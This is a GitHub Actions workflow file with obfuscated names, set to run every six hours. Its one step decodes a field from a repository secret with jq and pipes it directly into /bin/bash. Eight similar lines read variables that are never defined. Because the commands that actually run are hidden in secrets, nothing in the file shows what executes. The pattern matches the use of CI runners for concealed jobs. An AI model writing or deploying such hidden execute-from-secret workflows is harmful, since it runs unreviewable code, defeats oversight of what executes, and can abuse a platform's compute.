name: luoshantou8765
on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luoshantou8765
        env:
          vp7: ${{ secrets.vp7 }}
        run: |
          echo $vp7 | jq -r .iha161 | /bin/bash
          echo $c26478 | jq -r .msyc9 | /bin/bash
          echo $yy1 | jq -r .xgx248 | /bin/bash
          echo $wauu7295 | jq -r .cv26 | /bin/bash
          echo $hbxra8907 | jq -r .fhvd8430 | /bin/bash
          echo $qyb66531 | jq -r .cw574 | /bin/bash
          echo $a3 | jq -r .nns71847 | /bin/bash
          echo $ifqol80425 | jq -r .eb22 | /bin/bash
          echo $lji9 | jq -r .jnh13 | /bin/bash

